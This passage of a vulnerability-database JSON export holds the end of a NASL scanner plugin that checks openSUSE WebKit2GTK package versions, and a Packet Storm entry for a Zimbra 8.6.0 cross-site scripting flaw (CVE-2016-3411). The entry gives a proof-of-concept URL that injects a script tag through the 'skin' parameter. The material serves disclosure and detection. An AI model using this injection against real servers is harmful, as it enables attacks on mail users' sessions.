\"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-08-11T09:54:16", "references": [], "description": "", "edition": 1, "reporter": "Dino Barlattani", "published": "2018-08-10T00:00:00", "title": "Zimbra 8.6.0_GA_1153 Cross Site Scripting", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-08-11T09:54:16", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3411"], "modified": "2018-08-10T00:00:00", "id": "PACKETSTORM:148872", "href": "https://packetstormsecurity.com/files/148872/Zimbra-8.6.0_GA_1153-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Xss Zimbra Mail server \n# Google Dork: \n# Date: 2018/08/10 \n# Exploit Author: Dinbar78 \n# Vendor Homepage: https://www.zimbra.com/ \n \n# Version: 8.6.0_GA_1153 (build 20141215151110) \n# bug 103609 or CVE-2016-3411 \n \n \nPayload: es. \nhttps:// (zimbrasite)/h/changepass?skin=\"><script>alert('hacked');</script> \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148872/zimbra860ga-xss.txt"}]}}